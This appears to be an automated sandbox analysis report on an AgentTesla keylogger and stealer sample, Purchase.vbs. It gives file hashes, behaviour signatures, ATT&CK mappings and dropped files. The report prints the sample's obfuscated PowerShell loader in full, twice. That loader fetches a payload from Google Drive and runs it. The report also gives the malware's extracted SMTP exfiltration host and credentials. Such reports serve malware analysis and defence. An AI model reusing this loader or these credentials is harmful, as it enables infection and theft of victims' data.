agenttesla | 126e8204b6044a3bdb1d885cc462376377a3165d2c572de086baaa715f49ae9e

General

Target

Purchase.vbs
Size

105KB
MD5

09306e3d4884937ef15a686ee4aa1412
SHA1

dbdd7b1b1829232b4ff385fa5b98b5c3d7553fe2
SHA256

126e8204b6044a3bdb1d885cc462376377a3165d2c572de086baaa715f49ae9e
SHA512

9bf6ef2011b3d162142df67496e844d49f12ada62d5c0545070eb43034a01ee7cc3197e21448c70c1b0d918f773e6ef89940c3198288298c93ed36f5cf08fb22
SSDEEP

3072:C7UtxD30yAV1bePHvAVXJLlkGYmp47L+7OpkPWa2Ot:C7Utl0yAvbePHvAtJLlbJp47LSABa2Ot

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
boydjackson.org
Port:
587
Username:
[email protected]
Password:
Bukky101@

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
boydjackson.org
Port:
587
Username:
[email protected]
Password:
Bukky101@
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1888 WScript.exe
7 2732 powershell.exe
9 2732 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
11 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

580 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1852 powershell.exe
580 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1852 set thread context of 580 1852 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2732 powershell.exe
1852 powershell.exe
1852 powershell.exe
580 wab.exe
580 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1852 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2732 powershell.exe
Token: SeDebugPrivilege 1852 powershell.exe
Token: SeDebugPrivilege 580 wab.exe

flow	pid	process
3	1888	WScript.exe
7	2732	powershell.exe
9	2732	powershell.exe

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

flow	ioc
15	ip-api.com

pid	process
580	wab.exe

pid	process
1852	powershell.exe
580	wab.exe

description	pid	process	target process
PID 1852 set thread context of 580	1852	powershell.exe	wab.exe

pid	process
2732	powershell.exe
1852	powershell.exe
1852	powershell.exe
580	wab.exe
580	wab.exe

pid	process
1852	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	580	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1888 wrote to memory of 2732	1888	WScript.exe	powershell.exe
PID 1888 wrote to memory of 2732	1888	WScript.exe	powershell.exe
PID 1888 wrote to memory of 2732	1888	WScript.exe	powershell.exe
PID 2732 wrote to memory of 1904	2732	powershell.exe	cmd.exe
PID 2732 wrote to memory of 1904	2732	powershell.exe	cmd.exe
PID 2732 wrote to memory of 1904	2732	powershell.exe	cmd.exe
PID 2732 wrote to memory of 1852	2732	powershell.exe	powershell.exe
PID 2732 wrote to memory of 1852	2732	powershell.exe	powershell.exe
PID 2732 wrote to memory of 1852	2732	powershell.exe	powershell.exe
PID 2732 wrote to memory of 1852	2732	powershell.exe	powershell.exe
PID 1852 wrote to memory of 808	1852	powershell.exe	cmd.exe
PID 1852 wrote to memory of 808	1852	powershell.exe	cmd.exe
PID 1852 wrote to memory of 808	1852	powershell.exe	cmd.exe
PID 1852 wrote to memory of 808	1852	powershell.exe	cmd.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe
PID 1852 wrote to memory of 580	1852	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Purchase.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smalsavs = 1;$Benzoylated='Substrin';$Benzoylated+='g';Function Antipeptone($Sprjtepistolens){$Unpathed=$Sprjtepistolens.Length-$Smalsavs;For($Moppy=4; $Moppy -lt $Unpathed; $Moppy+=(5)){$Marchellas+=$Sprjtepistolens.$Benzoylated.Invoke($Moppy, $Smalsavs);}$Marchellas;}function Bllehattens($Guacico){. ($Frastdnings) ($Guacico);}$Sumption=Antipeptone 'NoveM.ljloBlokzSan iSadelDichlMiauaEl,e/Afkl5Ri s.Zymo0Minb Tab(AfplWsubai.ejlnLa.gdReteoA,tewPyntsdil. DebNFo.bTC,ti Fiss1Repl0 Pr .N nu0 Brn;Sej, DistWhldniS nsnKorp6Hull4Ki h;Ner. SphaxFlad6Aflb4posi; bor notirbre vDet,:Tra 1Sett2Tabe1Be i.stik0 F,n)Ankr TidG AaneHoitc InckK.looJdes/Chep2Toot0Evig1besy0Tale0Besk1Over0 Per1Stri DrueF.toni TourSammeLingfAttroBeg,xEmbr/Anar1 Fla2Avow1 Co..Voco0 Fem ';$Vertikalernes=Antipeptone 'HjlpUD,nds epte lsr tra- bagAPursg.isbe.ctonUndet Rme ';$Humanisation178=Antipeptone 'BerghMarotTarktM.nip L.nsN tu: D,k/Sa o/IndkdOmgar ModiMe.yv adieDebr.SleegHorsoUnstoPresgFer.lsongeDeni.,weicSkefoEtapmc no/LivsuFlauc Drb? araeIso xTr,lp OrloHis.rSyndt Ski= Cl dSafroRudewWavin ,hel T.loBlokaKan,d.lan&Raadi LbedDaym=Week1AfmaFNo zq CliUS,okZ EdunStikf Fral,ith6 DivAstamhMandzsec,1 Obl_UnirX onv7 ,yndSejlwSubii,ndiAeth,3OnyxS AnniQ.icUV.ndNTatt-ApreMEkstf,uescWaitfForeRWe.gRDrifGRin ';$Hindbaer=Antipeptone 'So,e>Ding ';$Frastdnings=Antipeptone 'Can,i Skie RobxP.rs ';$Foeticidal = Antipeptone 'Is,geVandcRoulhNa io ona Svmm% DelaforapKendp Sted.oksaAngutCaldaBa t%Tink\SlinD RenaTe rn Cans FabeMavekSub,oAgorm,encpAllea Tragk apn SysiEufoeDemotEvak.slbeSConvyeftesD.si Jak& .le& tu diapeE hec HalhVau.oB gg F.rg$Jo,e ';Bllehattens (Antipeptone 'Skar$lu.hg Sanl Curo RenbSleia Jewl ulc:Dup.PMarksSlideEstau.udidIndeo CoerUdspeBrodm RejiunrenJa eiPes sWindcLageeDagsnPebectra,eEle =Hjem(CliccFlatmWo.ddKryo Anns/Dublc.urb S,db$smidF,andoOccie.isetFlytiEdifc Masi itedTri,a ReklAbsc)Over ');Bllehattens (Antipeptone 'Regn$Bi.ig S nl.otpoFrugbAnw.aSerulBran: GesAGr naGenfrD.vosGuankChaio magrAfnat Dan9Bere9Subl=Fibe$Pal,HSlvfuGrshmWadmaV len DeviTra s,achaTr,st T oiTeamoPreanFull1Rewa7nebu8Tit..Abils Ap,pPi clGenei G,ztRuna(Udli$TallH arri o kn SpodHunkbElutaHelteOestrKoll)Re i ');$Humanisation178=$Aarskort99[0];Bllehattens (Antipeptone ' Ban$UnshgT,pil kl.o SerbHyp,a misl.imw:CyklSCalyiRen.mFr.ga SemrOberuParnb S,gavigts Mas=BlocNUdvaeoxypwJ.rd-ColeOBelebMu.ijSolie,etrc Mart,npr RastSStnkyImprsPtyatFodteVejrmkny,.retrN HaneAd itB,yf..itrWjudie.esobCollC KldlStudibnneeJnetnStrktS,ut ');Bllehattens (Antipeptone 'loka$ enSBis iDia,mSugeaStudrRejsuPulpb RebaSkovsLign. ,veHno.ce rugaSmerd nteeLangrDagrs,ulp[Best$UnreVSkraeUdlir GeotStikiSwisk AdraBaallTrise utbrNum.nAsieeSex,sIndi]Over=Unme$CutiSMi luTor,m Fr,pStamtlommiCensoPrefnOcci ');$Fetichdyrkernes=Antipeptone 'Bra.SVedliS bomDo oa Pser NonuVirtbi.puaStudsSupe. Sk,D betoTropwwar.nHypel t,toRonnaRotadF,liFLa.diBronlNonmeVold( Vaa$ latHOsetu,rtemmageaAffanAtt i BrnsfedeaBiortDyspiHa koDun,nAff,1Subj7Bjar8 Ini,Brat$ FordSkipe bdkk,anduRenmpS.ltrSalmeCarbrChaz)Tenn ';$Fetichdyrkernes=$Pseudoreminiscence[1]+$Fetichdyrkernes;$dekuprer=$Pseudoreminiscence[0];Bllehattens (Antipeptone 'Repo$ ovgl,edlMathoOks.bBaskaDisolKast:ReubDOrane ortsGloseMineaPerfm Hng=Skre(.obeT Fi eWeass Ta,t rej- CalPSprya,ekstObsehVedr .rf$Overd,roleNeg,kB.udu Sydp Acer.unieUnderPib.) Unt ');while (!$Deseam) {Bllehattens (Antipeptone 'Stra$ ,regbro,lLyknoChasbRegnayarilGrdf:DommRMyste.ermgFo piPascsBrnet syle V,drOvereUdmat Knis Hed=Trag$ eirtGreerKredurublelogi ') ;Bllehattens $Fetichdyrkernes;Bllehattens (Antipeptone 'Sto.S InttCalaaSmudrBouct av-DdsdSUnimlSupee OffeympepRero Pap4 Tar ');Bllehattens (Antipeptone 'Tilf$Leergdactl ModoHa ubaritaOrfdlSek :U.trD TypePoinsTypeej mfaDia,mFlyv=Klkk(WheaT,houeLakfsTirstE,ic-Be sPReduaUnsutHe,vhVehe For$ hutdPerseTrykkPeriuNoncpBiblrontoeK,ndr Uni)Styr ') ;Bllehattens (Antipeptone 'Knea$SkrigUreglFirto,ngab RejaPre,l Bro:Ar.eLFuldeFlagdWelssStam=Bort$F,regwatelChaposkilbRippaUrrelTaal:QuidMTisso Viru omnnFor,tya.syEls,+Dueu+Klim% ,el$ PosACoreaH nerGn,vsPiackOutgoUdlarTilrt Jas9 p.r9Flax.sproc Modo Sk.uPlacnIkrat.amp ') ;$Humanisation178=$Aarskort99[$Leds];}Bllehattens (Antipeptone 'Morg$HomigCarrlSkraoBehebKobbaKololOver:DoxofS ypaHaggcS.elt .eliTurnoacrouHaftsBouglNickyduro ,ev= Hig EmbeGmaskeMo,ttK.nt-LjpeCCya,o aagnEjakt GeneMaa,nPosttBars Mora$Statd KnuePrytk.triuE,fop AmmrBambeBud,r kal ');Bllehattens (Antipeptone ' Mar$Fl.vgOrd.l Bl,oNonsbMe aaBreflGrif:TetrS VirpGensrKorsiOrdsnMorugNordlS,ara Trag QueeKeefnPsite S,btSi,n Othe=Fres Foru[For,SSu ayagugsSammtMonueSys,m Ve..RadiCPharoNatunU,vivUncoe VenrBugstMe.e]Bror:Goni:spriFKa,frInteo,aywmKinsBOrdnaRestsPeoneUnde6Regu4KlasSUn ptSik,rmethiJe nnAtypgAstr( unm$Teltf DenaStracFis.tSkruiMulto,ankuGasusBogplTrepy T,v) Ove ');Bllehattens (Antipeptone 'Buti$ Kapg midl.knno,rifboutca Deblaabe:De aT.anae Te lMa seti,gfStknoSupenKonjsS,efeAstmlchoksEmbrkLepraSo.tbKrumeToogrJacknLeukeTelf Subs= I f Over[FrekS Kony A.asSkultHamieBo,lmF us.StemTUnwoeNondx Brot Gen.,rmaEextenInflc T.moYachdPaadi.ontnAutog nds]Sols:Shaw:PockASpekSp,asCundeIHareIUnin. DorGHabiePcgttD.unSklimtSyllr.eneiAlodn.eleg Tje(E.tr$.tudSSubap IntrSmagi PinnDrivgKa.nlHavvaIn.ig ,areBeknnAnlgeb ontAbou) Min ');Bllehattens (Antipeptone 'Grum$ A,lg SublRteboGehebSlava.ilelAnti:PalaSMu atMange Bl.mindbmSha eBinosAnt.a,ismmL.ndlIn re,porrOoloe rkesSnar= Suk$,ontT KlaeRo,ll StreSkygfMib o Pe n AndsGruneLejllBrugs Devkde oaOutqbTeoreAccer unsnDrpleIn.d.BenzsFremu eltbHa,msCeret S.mr AtoiNonpnGrafgPuer(ms.i3Uni,1Cabl6Ulve1Brke1Genn6Gang,Sign2T.tr6 Per4 Art2Und,1Prog)Isog ');Bllehattens $Stemmesamleres;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dansekompagniet.Sys && echo $"
    3⤵
    PID:1904
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smalsavs = 1;$Benzoylated='Substrin';$Benzoylated+='g';Function Antipeptone($Sprjtepistolens){$Unpathed=$Sprjtepistolens.Length-$Smalsavs;For($Moppy=4; $Moppy -lt $Unpathed; $Moppy+=(5)){$Marchellas+=$Sprjtepistolens.$Benzoylated.Invoke($Moppy, $Smalsavs);}$Marchellas;}function Bllehattens($Guacico){. ($Frastdnings) ($Guacico);}$Sumption=Antipeptone 'NoveM.ljloBlokzSan iSadelDichlMiauaEl,e/Afkl5Ri s.Zymo0Minb Tab(AfplWsubai.ejlnLa.gdReteoA,tewPyntsdil. DebNFo.bTC,ti Fiss1Repl0 Pr .N nu0 Brn;Sej, DistWhldniS nsnKorp6Hull4Ki h;Ner. SphaxFlad6Aflb4posi; bor notirbre vDet,:Tra 1Sett2Tabe1Be i.stik0 F,n)Ankr TidG AaneHoitc InckK.looJdes/Chep2Toot0Evig1besy0Tale0Besk1Over0 Per1Stri DrueF.toni TourSammeLingfAttroBeg,xEmbr/Anar1 Fla2Avow1 Co..Voco0 Fem ';$Vertikalernes=Antipeptone 'HjlpUD,nds epte lsr tra- bagAPursg.isbe.ctonUndet Rme ';$Humanisation178=Antipeptone 'BerghMarotTarktM.nip L.nsN tu: D,k/Sa o/IndkdOmgar ModiMe.yv adieDebr.SleegHorsoUnstoPresgFer.lsongeDeni.,weicSkefoEtapmc no/LivsuFlauc Drb? araeIso xTr,lp OrloHis.rSyndt Ski= Cl dSafroRudewWavin ,hel T.loBlokaKan,d.lan&Raadi LbedDaym=Week1AfmaFNo zq CliUS,okZ EdunStikf Fral,ith6 DivAstamhMandzsec,1 Obl_UnirX onv7 ,yndSejlwSubii,ndiAeth,3OnyxS AnniQ.icUV.ndNTatt-ApreMEkstf,uescWaitfForeRWe.gRDrifGRin ';$Hindbaer=Antipeptone 'So,e>Ding ';$Frastdnings=Antipeptone 'Can,i Skie RobxP.rs ';$Foeticidal = Antipeptone 'Is,geVandcRoulhNa io ona Svmm% DelaforapKendp Sted.oksaAngutCaldaBa t%Tink\SlinD RenaTe rn Cans FabeMavekSub,oAgorm,encpAllea Tragk apn SysiEufoeDemotEvak.slbeSConvyeftesD.si Jak& .le& tu diapeE hec HalhVau.oB gg F.rg$Jo,e ';Bllehattens (Antipeptone 'Skar$lu.hg Sanl Curo RenbSleia Jewl ulc:Dup.PMarksSlideEstau.udidIndeo CoerUdspeBrodm RejiunrenJa eiPes sWindcLageeDagsnPebectra,eEle =Hjem(CliccFlatmWo.ddKryo Anns/Dublc.urb S,db$smidF,andoOccie.isetFlytiEdifc Masi itedTri,a ReklAbsc)Over ');Bllehattens (Antipeptone 'Regn$Bi.ig S nl.otpoFrugbAnw.aSerulBran: GesAGr naGenfrD.vosGuankChaio magrAfnat Dan9Bere9Subl=Fibe$Pal,HSlvfuGrshmWadmaV len DeviTra s,achaTr,st T oiTeamoPreanFull1Rewa7nebu8Tit..Abils Ap,pPi clGenei G,ztRuna(Udli$TallH arri o kn SpodHunkbElutaHelteOestrKoll)Re i ');$Humanisation178=$Aarskort99[0];Bllehattens (Antipeptone ' Ban$UnshgT,pil kl.o SerbHyp,a misl.imw:CyklSCalyiRen.mFr.ga SemrOberuParnb S,gavigts Mas=BlocNUdvaeoxypwJ.rd-ColeOBelebMu.ijSolie,etrc Mart,npr RastSStnkyImprsPtyatFodteVejrmkny,.retrN HaneAd itB,yf..itrWjudie.esobCollC KldlStudibnneeJnetnStrktS,ut ');Bllehattens (Antipeptone 'loka$ enSBis iDia,mSugeaStudrRejsuPulpb RebaSkovsLign. ,veHno.ce rugaSmerd nteeLangrDagrs,ulp[Best$UnreVSkraeUdlir GeotStikiSwisk AdraBaallTrise utbrNum.nAsieeSex,sIndi]Over=Unme$CutiSMi luTor,m Fr,pStamtlommiCensoPrefnOcci ');$Fetichdyrkernes=Antipeptone 'Bra.SVedliS bomDo oa Pser NonuVirtbi.puaStudsSupe. Sk,D betoTropwwar.nHypel t,toRonnaRotadF,liFLa.diBronlNonmeVold( Vaa$ latHOsetu,rtemmageaAffanAtt i BrnsfedeaBiortDyspiHa koDun,nAff,1Subj7Bjar8 Ini,Brat$ FordSkipe bdkk,anduRenmpS.ltrSalmeCarbrChaz)Tenn ';$Fetichdyrkernes=$Pseudoreminiscence[1]+$Fetichdyrkernes;$dekuprer=$Pseudoreminiscence[0];Bllehattens (Antipeptone 'Repo$ ovgl,edlMathoOks.bBaskaDisolKast:ReubDOrane ortsGloseMineaPerfm Hng=Skre(.obeT Fi eWeass Ta,t rej- CalPSprya,ekstObsehVedr .rf$Overd,roleNeg,kB.udu Sydp Acer.unieUnderPib.) Unt ');while (!$Deseam) {Bllehattens (Antipeptone 'Stra$ ,regbro,lLyknoChasbRegnayarilGrdf:DommRMyste.ermgFo piPascsBrnet syle V,drOvereUdmat Knis Hed=Trag$ eirtGreerKredurublelogi ') ;Bllehattens $Fetichdyrkernes;Bllehattens (Antipeptone 'Sto.S InttCalaaSmudrBouct av-DdsdSUnimlSupee OffeympepRero Pap4 Tar ');Bllehattens (Antipeptone 'Tilf$Leergdactl ModoHa ubaritaOrfdlSek :U.trD TypePoinsTypeej mfaDia,mFlyv=Klkk(WheaT,houeLakfsTirstE,ic-Be sPReduaUnsutHe,vhVehe For$ hutdPerseTrykkPeriuNoncpBiblrontoeK,ndr Uni)Styr ') ;Bllehattens (Antipeptone 'Knea$SkrigUreglFirto,ngab RejaPre,l Bro:Ar.eLFuldeFlagdWelssStam=Bort$F,regwatelChaposkilbRippaUrrelTaal:QuidMTisso Viru omnnFor,tya.syEls,+Dueu+Klim% ,el$ PosACoreaH nerGn,vsPiackOutgoUdlarTilrt Jas9 p.r9Flax.sproc Modo Sk.uPlacnIkrat.amp ') ;$Humanisation178=$Aarskort99[$Leds];}Bllehattens (Antipeptone 'Morg$HomigCarrlSkraoBehebKobbaKololOver:DoxofS ypaHaggcS.elt .eliTurnoacrouHaftsBouglNickyduro ,ev= Hig EmbeGmaskeMo,ttK.nt-LjpeCCya,o aagnEjakt GeneMaa,nPosttBars Mora$Statd KnuePrytk.triuE,fop AmmrBambeBud,r kal ');Bllehattens (Antipeptone ' Mar$Fl.vgOrd.l Bl,oNonsbMe aaBreflGrif:TetrS VirpGensrKorsiOrdsnMorugNordlS,ara Trag QueeKeefnPsite S,btSi,n Othe=Fres Foru[For,SSu ayagugsSammtMonueSys,m Ve..RadiCPharoNatunU,vivUncoe VenrBugstMe.e]Bror:Goni:spriFKa,frInteo,aywmKinsBOrdnaRestsPeoneUnde6Regu4KlasSUn ptSik,rmethiJe nnAtypgAstr( unm$Teltf DenaStracFis.tSkruiMulto,ankuGasusBogplTrepy T,v) Ove ');Bllehattens (Antipeptone 'Buti$ Kapg midl.knno,rifboutca Deblaabe:De aT.anae Te lMa seti,gfStknoSupenKonjsS,efeAstmlchoksEmbrkLepraSo.tbKrumeToogrJacknLeukeTelf Subs= I f Over[FrekS Kony A.asSkultHamieBo,lmF us.StemTUnwoeNondx Brot Gen.,rmaEextenInflc T.moYachdPaadi.ontnAutog nds]Sols:Shaw:PockASpekSp,asCundeIHareIUnin. DorGHabiePcgttD.unSklimtSyllr.eneiAlodn.eleg Tje(E.tr$.tudSSubap IntrSmagi PinnDrivgKa.nlHavvaIn.ig ,areBeknnAnlgeb ontAbou) Min ');Bllehattens (Antipeptone 'Grum$ A,lg SublRteboGehebSlava.ilelAnti:PalaSMu atMange Bl.mindbmSha eBinosAnt.a,ismmL.ndlIn re,porrOoloe rkesSnar= Suk$,ontT KlaeRo,ll StreSkygfMib o Pe n AndsGruneLejllBrugs Devkde oaOutqbTeoreAccer unsnDrpleIn.d.BenzsFremu eltbHa,msCeret S.mr AtoiNonpnGrafgPuer(ms.i3Uni,1Cabl6Ulve1Brke1Genn6Gang,Sign2T.tr6 Per4 Art2Und,1Prog)Isog ');Bllehattens $Stemmesamleres;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dansekompagniet.Sys && echo $"
      4⤵
      PID:808
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2275fef8110fd5d603e06c69e907bd2f

SHA1
b125e58d207de5b8a028a731e24a95be6e842bbd

SHA256
f47aa201da70a36b4fd8af7c147ee70602976ae379556351a4b5e9c4e070e855

SHA512
bab88e21ebe51a7d21078a25fbaf0c738bf45d6611af8278841df24819dc28b4f402c3711253f00a57af7f0ea4bd7efb606c662703ef1560110c3adcc9d73250

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2A7C.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2A7F.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2BCD.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Dansekompagniet.Sys

Filesize
446KB

MD5
eddcec82926ca68f594839adf5cf1cfb

SHA1
b88ed323c024dc81b64f30bc632e1d1721d518ef

SHA256
012037effd302f371def9257927991dccfd7c8edf60afacaead9dfc7d8340589

SHA512
10566492a25904bca962a7026aacc690e7804625ee350df8c87ab4e466c1eb13495b06342b0bd8d2854b5c88a3716d8cda8c606d65ab6497dc386a01721ef944

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PVZZK1ULA6J61E8WUJT2.temp

Filesize
7KB

MD5
36f0092f96ee0d9d07607e20f3bac0e2

SHA1
76135006697458fb8fb20fe85a7ab434ebd64b3a

SHA256
97b95a7c77674786baad552f28e04d3ec14061d8a1de52913f5b1af8b62d4495

SHA512
5c51be4a32b99216c414b3e71bc07552b2abf1e3d9f5b942760e009762069883804575127c74f9c95bfdf72d6a206e8dc8a581b50d07e28480c1efae9fcc9d27

Download Submit
memory/580-135-0x0000000072AD0000-0x00000000731BE000-memory.dmp

Filesize
6.9MB

Download
memory/580-130-0x0000000000D80000-0x0000000001DE2000-memory.dmp

Filesize
16.4MB

Download
memory/580-134-0x0000000000D80000-0x0000000000DC2000-memory.dmp

Filesize
264KB

Download
memory/580-136-0x00000000200F0000-0x0000000020130000-memory.dmp

Filesize
256KB

Download
memory/580-137-0x00000000772C0000-0x0000000077469000-memory.dmp

Filesize
1.7MB

Download
memory/580-104-0x00000000772C0000-0x0000000077469000-memory.dmp

Filesize
1.7MB

Download
memory/580-105-0x00000000774E6000-0x00000000774E7000-memory.dmp

Filesize
4KB

Download
memory/580-106-0x00000000774B0000-0x0000000077586000-memory.dmp

Filesize
856KB

Download
memory/580-140-0x0000000072AD0000-0x00000000731BE000-memory.dmp

Filesize
6.9MB

Download
memory/580-141-0x00000000200F0000-0x0000000020130000-memory.dmp

Filesize
256KB

Download
memory/1852-88-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/1852-92-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/1852-89-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/1852-102-0x00000000774B0000-0x0000000077586000-memory.dmp

Filesize
856KB

Download
memory/1852-96-0x0000000006600000-0x0000000009B59000-memory.dmp

Filesize
53.3MB

Download
memory/1852-87-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/1852-86-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/1852-98-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/1852-99-0x0000000073300000-0x00000000738AB000-memory.dmp

Filesize
5.7MB

Download
memory/1852-100-0x00000000772C0000-0x0000000077469000-memory.dmp

Filesize
1.7MB

Download
memory/1852-101-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2732-77-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Filesize
9.6MB

Download
memory/2732-95-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-97-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-94-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-93-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-91-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Filesize
9.6MB

Download
memory/2732-133-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Filesize
9.6MB

Download
memory/2732-78-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-79-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Filesize
9.6MB

Download
memory/2732-80-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-81-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2732-76-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2732-75-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads